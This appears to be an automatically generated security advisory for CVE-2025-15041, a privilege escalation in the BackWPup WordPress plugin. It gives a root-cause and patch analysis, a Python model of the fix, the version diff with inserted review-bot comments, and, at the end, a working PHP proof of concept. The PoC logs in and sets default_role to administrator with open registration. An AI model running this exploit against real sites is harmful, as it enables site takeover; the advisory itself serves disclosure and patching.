Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-15041: BackWPup 5.0.0 – 5.6.2 – Authenticated (BackWPup Helper+) Privilege Escalation via Arbitrary Options Update (backwpup)

Plugin: backwpup
Severity: High (CVSS 7.2)
CWE: 862
Vulnerable Version: 5.6.2
Patched Version: 5.6.3
Disclosed: February 17, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-15041:
This vulnerability is an authenticated privilege escalation in the BackWPup WordPress plugin affecting versions 5.0.0 through 5.6.2. A missing capability check on a REST API endpoint lets attackers with subscriber-level access or higher update arbitrary WordPress site options, which leads to full site compromise; the issue is rated CVSS 7.2.

Root Cause:
The vulnerability exists in the `save_site_option()` function within `/backwpup/src/Jobs/API/Rest.php`. Before patching, the function’s REST route registration at line 337 used a generic `permission_callback` that called `has_permission()`. This callback did not verify the user possessed the required `backwpup_jobs_edit` or `backwpup_settings` capabilities before processing option updates. The vulnerable function at line 784 accepted arbitrary option names and values via the `$params` array without validating whether the option belonged to the plugin’s namespace.

Exploitation:
Attackers send a POST request to the WordPress REST API endpoint `/wp-json/backwpup/v1/site-option`. The request body contains parameters where the key is the target WordPress option name and the value is an array with a `value` field. To escalate privileges, attackers set `default_role` to `administrator` and `users_can_register` to `1`. This enables open registration with administrator privileges, allowing the attacker to create a new admin account.

Patch Analysis:
The patch in version 5.6.3 modifies two critical sections. First, it replaces the generic `permission_callback` at line 337 with an anonymous function that explicitly checks `current_user_can('backwpup_jobs_edit') || current_user_can('backwpup_settings')`. Second, `save_site_option()` now includes validation logic at lines 795-802. This validation ensures the option name starts with `backwpup` and is not in a blocklist of protected options, and it requires each option's input to be an array containing a `value` key. Violations throw a `RuntimeException`.
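As an added illustration of the root cause and the fix described above (not code from this page or from the BackWPup project), the following ports the 5.6.3 validation logic from the PHP diff to Python and runs the advisory's own request body through both a 5.6.2-style and a 5.6.3-style endpoint model. The third check, rejecting a non-string `value`, is an assumption added here because the PHP `trim()` call needs a string; the 5.6.2 branch is a simplified model; the option name `backwpup_cfg_loglevel` is taken from the diff.

```python
# Model of the guard that BackWPup 5.6.3 added to save_site_option() in
# src/Jobs/API/Rest.php, ported from the PHP diff to Python so it runs
# stand-alone. Added example, not the plugin's own code.

# Plugin-prefixed options the patch refuses to update (names from the diff).
PROTECTED_OPTIONS = frozenset({"backwpup_jobs", "backwpup_version",
                               "backwpup_previous_version", "backwpup_messages"})


class OptionUpdateRejected(Exception):
    """Stands in for the RuntimeException the patched PHP throws."""


def validate_option_update(name: str, data) -> str:
    """Apply the 5.6.3 checks to one (option name, request data) pair.

    Mirrors   strpos($key, 'backwpup') !== 0 || in_array($key, [...], true)
    and       ! is_array($values) || ! array_key_exists('value', $values)
    Returns the trimmed value that would be written, or raises.
    """
    # Check 1: plugin namespace prefix, minus an exact-match denylist.
    if not name.startswith("backwpup") or name in PROTECTED_OPTIONS:
        raise OptionUpdateRejected(f'Update of site option "{name}" is not allowed')
    # Check 2: data must be an object/array carrying a "value" key.
    if not isinstance(data, dict) or "value" not in data:
        raise OptionUpdateRejected(f'Invalid data format for site option "{name}"')
    # The PHP then calls trim() on the value, which needs a string; the diff
    # does not check the type, so this third check is our own assumption.
    if not isinstance(data["value"], str):
        raise OptionUpdateRejected(f'Non-string value for site option "{name}"')
    return data["value"].strip()


def apply_request(params: dict, patched: bool) -> dict:
    """Simulate the endpoint's foreach over the request body.

    patched=False models 5.6.2, where any key was taken as an option name
    (only the {"value": ...} shape is modelled there). The PHP throws out of
    the loop, so keys handled before the rejected one stay in 'written',
    assuming the update happens inside the loop as the diff context suggests.
    """
    written = {}
    try:
        for name, data in params.items():
            value = (validate_option_update(name, data) if patched
                     else str(data["value"]).strip())
            if value != "":               # the PHP skips empty values
                written[name] = value
    except OptionUpdateRejected as exc:
        return {"accepted": False, "written": written, "error": str(exc)}
    return {"accepted": True, "written": written, "error": None}


# Constructed request bodies for the demo (not captured from a real site).
ATTACK_BODY = {"default_role": {"value": "administrator"},   # body from the advisory
               "users_can_register": {"value": "1"}}
LEGIT_BODY = {"backwpup_cfg_loglevel": {"value": "debug"}}    # plugin option from the diff
MALFORMED_BODY = {"backwpup_cfg_loglevel": "debug"}           # no {"value": ...} wrapper


def demo() -> dict:
    """Run the three bodies through both versions of the endpoint model."""
    return {
        "unpatched_attack": apply_request(ATTACK_BODY, patched=False),
        "patched_attack": apply_request(ATTACK_BODY, patched=True),
        "patched_legit": apply_request(LEGIT_BODY, patched=True),
        "patched_malformed": apply_request(MALFORMED_BODY, patched=True),
    }


if __name__ == "__main__":
    for label, r in demo().items():
        print(f"{label:17} accepted={r['accepted']!s:5} written={r['written']} error={r['error']}")
```

Because the namespace test is a plain prefix match with a short exact-match denylist, any plugin-prefixed option outside that list is still writable by users holding either capability, which is why the capability check is the load-bearing part of the fix.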

Impact:
Successful exploitation grants attackers full administrative control over the WordPress site. Attackers can modify any WordPress site option, including authentication settings, user roles, and plugin configurations. The primary attack vector changes the default user registration role to administrator and enables user registration, creating a persistent backdoor. Attackers can also disable security plugins, modify file permissions, or inject malicious code through theme or plugin settings.

Differential between vulnerable and patched code

Code Diff
--- a/backwpup/backwpup.php
+++ b/backwpup/backwpup.php
@@ -5,7 +5,7 @@
  * Description: WordPress Backup Plugin
  * Author: BackWPup – WordPress Backup & Restore Plugin
  * Author URI: https://backwpup.com
- * Version: 5.6.2
+ * Version: 5.6.3
  * Requires at least: 4.9
  * Requires PHP: 7.4
  * Text Domain: backwpup
--- a/backwpup/inc/class-destination-ftp-downloader.php
+++ b/backwpup/inc/class-destination-ftp-downloader.php
@@ -132,9 +132,16 @@
 			$this->source_file_handler = @fopen( $url, 'r' ); // phpcs:ignore WordPress.PHP.NoSilencedErrors.Discouraged, WordPress.WP.AlternativeFunctions.file_system_operations_fopen
 		}

-        if (!is_resource($this->source_file_handler)) {
-            throw new RuntimeException(__('Cannot open FTP file for download.', 'backwpup'));
-        }
+		if ( ! is_resource( $this->source_file_handler ) ) {
+			throw new RuntimeException(
+				sprintf(
+					// translators: %1$s: opening a tag, %2$s: closing a tag.
+					esc_html__( 'BackWPup couldn’t download the backup file from your FTP server. Please check your FTP connection settings and permissions. See %1$sthe FTP setup guide%2$s for more details.', 'backwpup' ),
+					'<a href="https://backwpup.com/docs/how-to-save-backups-to-your-ftp-server/" title="the FTP setup guide" target="_blank" rel="noopener noreferrer" class="text-primary-darker border-b border-primary-darker">',
+					'</a>'
+				)
+			);
+		}
     }

     /**
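Review bot: the new exception message embeds raw HTML; `esc_html__()` escapes only the translated template, and the `<a ...>` anchor is then spliced in unescaped by `sprintf()`, so whatever renders this RuntimeException's message must pass it through `wp_kses()` limited to that anchor or escape it entirely, and the hunk does not show where the message ends up. A smaller point: the silenced `@fopen` above means the underlying FTP error is lost; logging `error_get_last()` before throwing would keep the diagnostic the user-facing text no longer carries.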
--- a/backwpup/inc/class-destinations.php
+++ b/backwpup/inc/class-destinations.php
@@ -147,8 +147,15 @@
 	 * @return array
 	 */
 	public function file_get_list( string $jobdest ): array {
-		$list  = (array) get_site_transient( 'backwpup_' . strtolower( $jobdest ) );
-		$files = array_filter( $list );
+		$key  = 'backwpup_' . strtolower( $jobdest );
+		$list = get_site_transient( $key );
+
+		if ( false === $list ) {
+			// Legacy compatibility (e.g. Glacier history stored in options).
+			$list = get_site_option( $key, [] );
+		}
+
+		$files = array_filter( (array) $list );

 		// Disable auto downloading for onedrive during restoration see #1239 on Github.
 		if ( BackWPup::is_pro() && $this->get_service_name() !== 'OneDrive' ) {
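Review bot: the `false === $list` fallback cannot distinguish a transient that was never set from one that expired, since `get_site_transient()` returns `false` in both cases, so an expired cache silently falls through to the legacy option value for every `$jobdest`, not only the Glacier case the comment names; if the option path is truly legacy-only, restrict it to that service or document that the option is the authoritative store. Minor: `get_site_option( $key, [] )` already defaults to an empty array, so the later `(array)` cast only matters for the transient branch.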
--- a/backwpup/inc/class-file.php
+++ b/backwpup/inc/class-file.php
@@ -193,7 +193,7 @@
 			 *
 			 * @param bool $protect_folders Whether the folder will be protect or not.
 			 */
-			$protect_folders = wpm_apply_filters_typed( 'boolean', 'backwpup_protect_folders', (bool) get_site_option( 'backwpup_cfg_protectfolders' ) );
+			$protect_folders = wpm_apply_filters_typed( 'boolean', 'backwpup_protect_folders', true );
 			if ( $protect_folders ) {
 				self::protect_folder( $childFolder ); // phpcs:ignore
 			}
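Review bot: passing a literal `true` removes the `backwpup_cfg_protectfolders` setting as an opt-out, leaving the `backwpup_protect_folders` filter as the only way to disable folder protection; say so in the filter docblock above, which also reads "will be protect or not" and should read "protected". Since the other hunks drop the option from the defaults, the settings form and the Subscriber list, the change is consistent, but nothing in the patch deletes the stale `backwpup_cfg_protectfolders` row on upgraded sites.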
--- a/backwpup/inc/class-option.php
+++ b/backwpup/inc/class-option.php
@@ -19,7 +19,6 @@
 		// general.
 		add_site_option( 'backwpup_cfg_showadminbar', true );
 		add_site_option( 'backwpup_cfg_showfoldersize', false );
-		add_site_option( 'backwpup_cfg_protectfolders', true );
 		add_site_option( 'backwpup_cfg_keepplugindata', false );
 		// job.
 		add_site_option( 'backwpup_cfg_jobmaxexecutiontime', 30 );
--- a/backwpup/inc/class-page-settings.php
+++ b/backwpup/inc/class-page-settings.php
@@ -382,29 +382,28 @@

 		// Set default options if button clicked.
         if (isset($_POST['default_settings']) && $_POST['default_settings']) { // phpcs:ignore
-            delete_site_option('backwpup_cfg_showadminbar');
-            delete_site_option('backwpup_cfg_showfoldersize');
-            delete_site_option('backwpup_cfg_jobstepretry');
-            delete_site_option('backwpup_cfg_jobmaxexecutiontime');
-            delete_site_option('backwpup_cfg_loglevel');
-            delete_site_option('backwpup_cfg_jobwaittimems');
-            delete_site_option('backwpup_cfg_jobrunauthkey');
-            delete_site_option('backwpup_cfg_jobdooutput');
-            delete_site_option('backwpup_cfg_windows');
-            delete_site_option('backwpup_cfg_maxlogs');
-            delete_site_option('backwpup_cfg_gzlogs');
-            delete_site_option('backwpup_cfg_protectfolders');
-            delete_site_option('backwpup_cfg_authentication');
-            delete_site_option('backwpup_cfg_logfolder');
-            delete_site_option('backwpup_cfg_dropboxappkey');
-            delete_site_option('backwpup_cfg_dropboxappsecret');
-            delete_site_option('backwpup_cfg_dropboxsandboxappkey');
-            delete_site_option('backwpup_cfg_dropboxsandboxappsecret');
-            delete_site_option('backwpup_cfg_sugarsynckey');
-            delete_site_option('backwpup_cfg_sugarsyncsecret');
-            delete_site_option('backwpup_cfg_sugarsyncappid');
-            delete_site_option('backwpup_cfg_hash');
-            delete_site_option('backwpup_cfg_keepplugindata');
+			delete_site_option( 'backwpup_cfg_showadminbar' );
+			delete_site_option( 'backwpup_cfg_showfoldersize' );
+			delete_site_option( 'backwpup_cfg_jobstepretry' );
+			delete_site_option( 'backwpup_cfg_jobmaxexecutiontime' );
+			delete_site_option( 'backwpup_cfg_loglevel' );
+			delete_site_option( 'backwpup_cfg_jobwaittimems' );
+			delete_site_option( 'backwpup_cfg_jobrunauthkey' );
+			delete_site_option( 'backwpup_cfg_jobdooutput' );
+			delete_site_option( 'backwpup_cfg_windows' );
+			delete_site_option( 'backwpup_cfg_maxlogs' );
+			delete_site_option( 'backwpup_cfg_gzlogs' );
+			delete_site_option( 'backwpup_cfg_authentication' );
+			delete_site_option( 'backwpup_cfg_logfolder' );
+			delete_site_option( 'backwpup_cfg_dropboxappkey' );
+			delete_site_option( 'backwpup_cfg_dropboxappsecret' );
+			delete_site_option( 'backwpup_cfg_dropboxsandboxappkey' );
+			delete_site_option( 'backwpup_cfg_dropboxsandboxappsecret' );
+			delete_site_option( 'backwpup_cfg_sugarsynckey' );
+			delete_site_option( 'backwpup_cfg_sugarsyncsecret' );
+			delete_site_option( 'backwpup_cfg_sugarsyncappid' );
+			delete_site_option( 'backwpup_cfg_hash' );
+			delete_site_option( 'backwpup_cfg_keepplugindata' );

             foreach ($this->settings_updaters as $setting) {
                 $setting->reset();
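Review bot: dropping `delete_site_option('backwpup_cfg_protectfolders')` from the reset-to-defaults handler means sites upgraded from 5.6.2 keep that orphaned option indefinitely; keeping the line, or a one-time `delete_site_option()` in the upgrade path, would clean it up. The space-to-tab reindent of the other 22 `delete_site_option()` lines makes the hunk read as a rewrite when only one line is removed; keep whitespace-only changes in a separate commit or review the hunk with `-w`.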
@@ -434,7 +433,6 @@
 			'backwpup_cfg_windows'              => get_site_option( 'backwpup_cfg_windows' ),
 			'backwpup_cfg_maxlogs'              => get_site_option( 'backwpup_cfg_maxlogs' ),
 			'backwpup_cfg_gzlogs'               => get_site_option( 'backwpup_cfg_gzlogs' ),
-			'backwpup_cfg_protectfolders'       => get_site_option( 'backwpup_cfg_protectfolders' ),
 			'backwpup_cfg_jobrunauthkey'        => get_site_option( 'backwpup_cfg_jobrunauthkey' ),
 			'backwpup_cfg_logfolder'            => get_site_option( 'backwpup_cfg_logfolder' ),
 			'backwpup_cfg_authentication'       => get_site_option( 'backwpup_cfg_authentication' ),
@@ -473,8 +471,7 @@
 			$new_options['backwpup_cfg_maxlogs'] = absint( $_POST['maxlogs'] );
 		}

-		$new_options['backwpup_cfg_gzlogs']         = ! empty( $_POST['gzlogs'] );
-		$new_options['backwpup_cfg_protectfolders'] = ! empty( $_POST['protectfolders'] );
+		$new_options['backwpup_cfg_gzlogs'] = ! empty( $_POST['gzlogs'] );

 		if ( isset( $_POST['jobrunauthkey'] ) ) {
 			$new_options['backwpup_cfg_jobrunauthkey'] = preg_replace( '/[^a-zA-Z0-9]/', '', trim( (string) sanitize_text_field( wp_unslash( $_POST['jobrunauthkey'] ) ) ) );
--- a/backwpup/pages/backups.php
+++ b/backwpup/pages/backups.php
@@ -17,6 +17,7 @@
         <div class="progressbar" style="display: none;">
           <div id="progresssteps" class="bwpu-progress" style="width:0%;">0%</div>
         </div>
+        <div id="error-ui" style="display: none;" role="alert" aria-live="polite"></div>
       <?php
       if ( BackWPup::is_pro() ) {
         $view = new ViewLoader();
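Review bot: `role="alert"` implies `aria-live="assertive"`, so the explicit `aria-live="polite"` on the new `#error-ui` element contradicts it; use `role="status"` with `polite`, or `role="alert"` alone. The hunk only adds the container, so make sure the script that fills it assigns `textContent` rather than `innerHTML` for any message that originates from the server or the request.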
--- a/backwpup/src/Admin/Subscriber.php
+++ b/backwpup/src/Admin/Subscriber.php
@@ -55,7 +55,6 @@
 			'backwpup_activation_time',
 			'backwpup_cfg_showadminbar',
 			'backwpup_cfg_showfoldersize',
-			'backwpup_cfg_protectfolders',
 			'backwpup_cfg_keepplugindata',
 			'backwpup_cfg_jobmaxexecutiontime',
 			'backwpup_cfg_jobstepretry',
--- a/backwpup/src/Hosting/Kinsta.php
+++ b/backwpup/src/Hosting/Kinsta.php
@@ -53,6 +53,9 @@
 	 * @return string Returns 'db' if the backup type is only database, 'file' if it is only files, 'full' if it is both, or an empty string if none match.
 	 */
 	public function get_backup_type( array $job_data ) {
+		if ( empty( $job_data['type'] ) || ! is_array( $job_data['type'] ) ) {
+			return '';
+		}
 		if ( ! in_array( 'FILE', $job_data['type'], true ) && in_array( 'DBDUMP', $job_data['type'], true ) ) {
 			return 'db';
 		} elseif ( in_array( 'FILE', $job_data['type'], true ) && ! in_array( 'DBDUMP', $job_data['type'], true ) ) {
--- a/backwpup/src/Jobs/API/Rest.php
+++ b/backwpup/src/Jobs/API/Rest.php
@@ -334,7 +334,9 @@
 			[
 				'methods'             => 'POST',
 				'callback'            => [ $this, 'save_site_option' ],
-				'permission_callback' => [ $this, 'has_permission' ],
+				'permission_callback' => function () {
+					return current_user_can( 'backwpup_jobs_edit' ) || current_user_can( 'backwpup_settings' );
+				},
 			]
 		);

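Review bot: the capability check is now explicit, but it is an inline closure on a single route; if `has_permission()` is still used by other routes in this file (the hunk does not show it), those keep whatever weaker check it performed. Move the `backwpup_jobs_edit` / `backwpup_settings` test into a named method, or fix `has_permission()` itself, so every state-changing route shares the same check and it can be unit-tested.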
@@ -784,6 +786,8 @@
 	 * @param WP_REST_Request $request The REST request object containing the parameters.
 	 *
 	 * @return WP_REST_Response The response object containing the status and message.
+	 *
+	 * @throws RuntimeException If an update of a site option is not allowed.
 	 */
 	public function save_site_option( WP_REST_Request $request ) {
 		$params = $request->get_params();
@@ -791,6 +795,14 @@
 		$status = 200;
 		try {
 			foreach ( $params as $key => $values ) {
+				if ( strpos( $key, 'backwpup' ) !== 0 || in_array( $key, [ 'backwpup_jobs', 'backwpup_version', 'backwpup_previous_version', 'backwpup_messages' ], true ) ) {
+					// translators: %s = site option name.
+					throw new RuntimeException( sprintf( __( 'Update of site option with name is "%s" not allowed!', 'backwpup' ), $key ) );
+				}
+				if ( ! is_array( $values ) || ! array_key_exists( 'value', $values ) ) {
+					// translators: %s = site option name.
+					throw new RuntimeException( sprintf( __( 'Invalid data format for site option "%s".', 'backwpup' ), $key ) );
+				}
 				if ( '' !== trim( $values['value'] ) ) {
 					$value = sanitize_text_field( $values['value'] );
 					if ( isset( $values['secure'] ) && true === filter_var( $values['secure'], FILTER_VALIDATE_BOOLEAN ) ) {
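Review bot: the format check `if ( ! is_array( $values ) || ! array_key_exists( 'value', $values ) )` verifies the key exists but not that it holds a string, yet the next line calls `trim( $values['value'] )`; on PHP 8 a nested array or null there raises a `TypeError`, which a `catch` limited to `RuntimeException` would not handle. Add `|| ! is_string( $values['value'] )` to the same condition. Also, the namespace check is a bare `strpos() !== 0` prefix test with an exact-match denylist of four names, so any other `backwpup*` option stays writable by users holding either capability; a positive allowlist of the settings this endpoint is meant to edit would fail closed when new options are introduced. Minor: the message 'Update of site option with name is "%s" not allowed!' should read 'Update of site option "%s" is not allowed.'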
--- a/backwpup/vendor/autoload.php
+++ b/backwpup/vendor/autoload.php
@@ -19,4 +19,4 @@

 require_once __DIR__ . '/composer/autoload_real.php';

-return ComposerAutoloaderInit5cbcfb1449c8529bdcab591b4c0578d6::getLoader();
+return ComposerAutoloaderInit78debad7f3a589ccb6f8e0e447ced1a5::getLoader();
--- a/backwpup/vendor/composer/autoload_real.php
+++ b/backwpup/vendor/composer/autoload_real.php
@@ -2,7 +2,7 @@

 // autoload_real.php @generated by Composer

-class ComposerAutoloaderInit5cbcfb1449c8529bdcab591b4c0578d6
+class ComposerAutoloaderInit78debad7f3a589ccb6f8e0e447ced1a5
 {
     private static $loader;

@@ -24,20 +24,20 @@

         require __DIR__ . '/platform_check.php';

-        spl_autoload_register(array('ComposerAutoloaderInit5cbcfb1449c8529bdcab591b4c0578d6', 'loadClassLoader'), true, true);
+        spl_autoload_register(array('ComposerAutoloaderInit78debad7f3a589ccb6f8e0e447ced1a5', 'loadClassLoader'), true, true);
         self::$loader = $loader = new ComposerAutoloadClassLoader(dirname(__DIR__));
-        spl_autoload_unregister(array('ComposerAutoloaderInit5cbcfb1449c8529bdcab591b4c0578d6', 'loadClassLoader'));
+        spl_autoload_unregister(array('ComposerAutoloaderInit78debad7f3a589ccb6f8e0e447ced1a5', 'loadClassLoader'));

         $includePaths = require __DIR__ . '/include_paths.php';
         $includePaths[] = get_include_path();
         set_include_path(implode(PATH_SEPARATOR, $includePaths));

         require __DIR__ . '/autoload_static.php';
-        call_user_func(ComposerAutoloadComposerStaticInit5cbcfb1449c8529bdcab591b4c0578d6::getInitializer($loader));
+        call_user_func(ComposerAutoloadComposerStaticInit78debad7f3a589ccb6f8e0e447ced1a5::getInitializer($loader));

         $loader->register(true);

-        $filesToLoad = ComposerAutoloadComposerStaticInit5cbcfb1449c8529bdcab591b4c0578d6::$files;
+        $filesToLoad = ComposerAutoloadComposerStaticInit78debad7f3a589ccb6f8e0e447ced1a5::$files;
         $requireFile = Closure::bind(static function ($fileIdentifier, $file) {
             if (empty($GLOBALS['__composer_autoload_files'][$fileIdentifier])) {
                 $GLOBALS['__composer_autoload_files'][$fileIdentifier] = true;
--- a/backwpup/vendor/composer/autoload_static.php
+++ b/backwpup/vendor/composer/autoload_static.php
@@ -4,7 +4,7 @@

 namespace ComposerAutoload;

-class ComposerStaticInit5cbcfb1449c8529bdcab591b4c0578d6
+class ComposerStaticInit78debad7f3a589ccb6f8e0e447ced1a5
 {
     public static $files = array (
         '7b11c4dc42b3b3023073cb14e519683c' => __DIR__ . '/..' . '/ralouphie/getallheaders/src/getallheaders.php',
@@ -497,10 +497,10 @@
     public static function getInitializer(ClassLoader $loader)
     {
         return Closure::bind(function () use ($loader) {
-            $loader->prefixLengthsPsr4 = ComposerStaticInit5cbcfb1449c8529bdcab591b4c0578d6::$prefixLengthsPsr4;
-            $loader->prefixDirsPsr4 = ComposerStaticInit5cbcfb1449c8529bdcab591b4c0578d6::$prefixDirsPsr4;
-            $loader->prefixesPsr0 = ComposerStaticInit5cbcfb1449c8529bdcab591b4c0578d6::$prefixesPsr0;
-            $loader->classMap = ComposerStaticInit5cbcfb1449c8529bdcab591b4c0578d6::$classMap;
+            $loader->prefixLengthsPsr4 = ComposerStaticInit78debad7f3a589ccb6f8e0e447ced1a5::$prefixLengthsPsr4;
+            $loader->prefixDirsPsr4 = ComposerStaticInit78debad7f3a589ccb6f8e0e447ced1a5::$prefixDirsPsr4;
+            $loader->prefixesPsr0 = ComposerStaticInit78debad7f3a589ccb6f8e0e447ced1a5::$prefixesPsr0;
+            $loader->classMap = ComposerStaticInit78debad7f3a589ccb6f8e0e447ced1a5::$classMap;

         }, null, ClassLoader::class);
     }
--- a/backwpup/vendor/composer/installed.php
+++ b/backwpup/vendor/composer/installed.php
@@ -1,9 +1,9 @@
 <?php return array(
     'root' => array(
         'name' => 'inpsyde/backwpup-pro',
-        'pretty_version' => '5.6.2',
-        'version' => '5.6.2.0',
-        'reference' => 'ea3ccc5ebab7f6b3a5d59ae7349234908d74950e',
+        'pretty_version' => '5.6.3',
+        'version' => '5.6.3.0',
+        'reference' => '0e479eb6bfaa730c171d973badd74f586f78a684',
         'type' => 'wordpress-plugin',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -83,18 +83,18 @@
             'dev_requirement' => false,
         ),
         'inpsyde/backwpup-pro' => array(
-            'pretty_version' => '5.6.2',
-            'version' => '5.6.2.0',
-            'reference' => 'ea3ccc5ebab7f6b3a5d59ae7349234908d74950e',
+            'pretty_version' => '5.6.3',
+            'version' => '5.6.3.0',
+            'reference' => '0e479eb6bfaa730c171d973badd74f586f78a684',
             'type' => 'wordpress-plugin',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),
             'dev_requirement' => false,
         ),
         'inpsyde/backwpup-restore-shared' => array(
-            'pretty_version' => '0.20.4',
-            'version' => '0.20.4.0',
-            'reference' => '2bbdd156bcc39ce8e7d82447f685f9172a05fbf3',
+            'pretty_version' => '0.20.5',
+            'version' => '0.20.5.0',
+            'reference' => 'bdb08977a01a234a95cbc267bd5a81cf8ca7d2ba',
             'type' => 'library',
             'install_path' => __DIR__ . '/../inpsyde/backwpup-restore-shared',
             'aliases' => array(),
--- a/backwpup/vendor/inpsyde/backwpup-restore-shared/src/Api/Controller/JobController.php
+++ b/backwpup/vendor/inpsyde/backwpup-restore-shared/src/Api/Controller/JobController.php
@@ -193,6 +193,9 @@
         // Set service and job_id in registry for future use
         $this->registry->service_name = $service_name;
         $this->registry->job_id = $job_id;
+        //rest if uploaded again
+        $this->registry->uploaded_file = $local_file_path;
+        $this->registry->decompression_state = null;

         $factory = new BackWPup_Destination_Downloader_Factory();
         $downloader = $factory->create(
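Review bot: the comment `//rest if uploaded again` should read `// reset if uploaded again`, and it should say what `decompression_state = null` resets, since the state it belongs to is not visible in this hunk; a reader cannot tell from these lines whether clearing it on every job start is safe for a restore resumed after a partial decompression.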
@@ -337,6 +340,11 @@
         // Restore the db.
         $this->database_importer->import();

+        //flush WP cache after db restore
+        if (function_exists('wp_cache_flush')) {
+            wp_cache_flush();
+        }
+
         // Refresh file list
         if ($this->registry->service_name && $this->registry->job_id) {
             $destination_factory = new DestinationFactory($this->registry->service_name);
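Review bot: flushing the object cache right after `$this->database_importer->import()` is the right call, since cached option and post rows would otherwise mask the restored data; the `function_exists( 'wp_cache_flush' )` guard implies this code can run outside WordPress, which deserves a comment saying the flush is a deliberate no-op there. Style nit: `//flush` lacks the space after `//` used elsewhere in the file (`// Restore the db.`).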

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.


PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-15041 - BackWPup 5.0.0 - 5.6.2 - Authenticated (BackWPup Helper+) Privilege Escalation via Arbitrary Options Update

$target_url = 'https://vulnerable-site.com';
$username = 'attacker';
$password = 'password';

// Step 1: Authenticate to WordPress
$login_url = $target_url . '/wp-login.php';
$wp_rest_url = $target_url . '/wp-json/backwpup/v1/site-option';

$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => '1'
    ]),
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_COOKIEJAR => 'cookies.txt',
    CURLOPT_COOKIEFILE => 'cookies.txt',
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_HEADER => true
]);

$response = curl_exec($ch);

// Step 2: Check authentication success (the login redirect to wp-admin is visible
// because CURLOPT_HEADER keeps response headers in $response)
if (strpos($response, 'Location: ' . $target_url . '/wp-admin/') === false) {
    die("Authentication failed\n");
}

// Step 3: Exploit the vulnerability to enable admin registration
$payload = json_encode([
    'default_role' => ['value' => 'administrator'],
    'users_can_register' => ['value' => '1']
]);

curl_setopt_array($ch, [
    CURLOPT_URL => $wp_rest_url,
    CURLOPT_POSTFIELDS => $payload,
    CURLOPT_HTTPHEADER => [
        'Content-Type: application/json',
        'Content-Length: ' . strlen($payload)
    ]
]);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Step 4: Verify exploitation
if ($http_code === 200 && strpos($response, 'success') !== false) {
    echo "Vulnerability exploited successfully. Admin registration enabled.\n";
    echo 'Attackers can now register at: ' . $target_url . "/wp-login.php?action=register\n";
    echo "New accounts will have administrator privileges.\n";
} else {
    echo 'Exploitation failed. HTTP Code: ' . $http_code . "\n";
    echo 'Response: ' . $response . "\n";
}

curl_close($ch);
